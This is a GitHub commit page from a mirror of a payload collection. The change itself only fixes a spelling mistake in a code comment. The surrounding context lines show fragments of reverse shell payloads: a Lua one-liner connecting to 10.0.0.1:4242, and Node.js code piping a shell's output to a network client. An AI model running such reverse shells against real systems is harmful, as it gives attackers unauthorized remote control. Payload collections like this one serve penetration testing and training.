1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-06-02 06:36:06 +02:00
This commit is contained in:
Spidycodes 2022-08-02 21:48:07 +00:00 committed by GitHub
parent e386a110d9
commit bb6c9ed172
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -343,7 +343,7 @@ lua5.1 -e 'local host, port = "10.0.0.1", 4242 local socket = require("socket")
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
return /a/; // Prevents the Node.js application from crashing
})();